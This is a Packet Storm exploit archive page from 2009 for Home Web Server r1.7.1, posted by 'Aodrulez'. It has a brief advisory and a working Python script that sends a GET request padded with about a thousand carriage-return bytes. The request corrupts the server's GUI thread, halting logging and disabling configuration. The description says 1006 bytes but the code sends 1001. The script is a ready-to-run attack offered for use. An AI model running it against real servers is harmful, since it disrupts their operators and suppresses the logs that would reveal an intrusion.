what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Home Web Server r1.7.1 Memory Corruption

Home Web Server r1.7.1 Memory Corruption
Posted Apr 23, 2009
Authored by Aodrulez | Site aodrulez.blogspot.com

Home Web Server versions r1.7.1 and below GUI thread memory corruption exploit.

tags | exploit, web
SHA-256 | 04325da9d931a22cb87128679ac7cfa9a7eaa5b39a5af0eeec4211e764ea49f8

Home Web Server r1.7.1 Memory Corruption

Change Mirror Download
  Home Web Server <=r1.7.1 (build 147) "Gui Thread-Memory Corruption Exploit." By: Aodrulez.

Homepage : http://downstairs.dnsalias.net/homewebserver.html
Product Released : 22.4.2009/21:16:58


Description:
This web server when fed with
1006 bytes of chr(0x0d),with the html
"GET" parameter,the Server's Gui's
Thread gets corrupted.This means,
though the web server works normally,
(due to Multithreading),No more Logs
are generated.Also "all" the web server
configuration settings are unavailable.



Exploit (Python):
----------------------------------------------------------
# Echo client program
import socket

HOST = 'localhost' # The remote host
pORT = 80 # The same port as used by the server
print '####################################'
print '#Home Web Server r1.7.1 (build 147)#'
print '# Gui Thread Corruption Exploit #'
print '# #'
print '# By: Aodrulez #'
print '# f3arm3d3ar@gmail.com #'
print '# #'
print '####################################'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, pORT))
p='GET '+chr(0x0d)*1001+'index.html HTTp/1.0\r\n\r\n'
s.send(p)
s.close()
print '\"'+HOST+'\'s Gui Got Corrupted :P\" '
---------------------------------------------------------

Greetz Fly out to:
1] Amforked() : My Mentor.
2] The Blue Genius : :-)
3] www.OrchidSeven.com


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close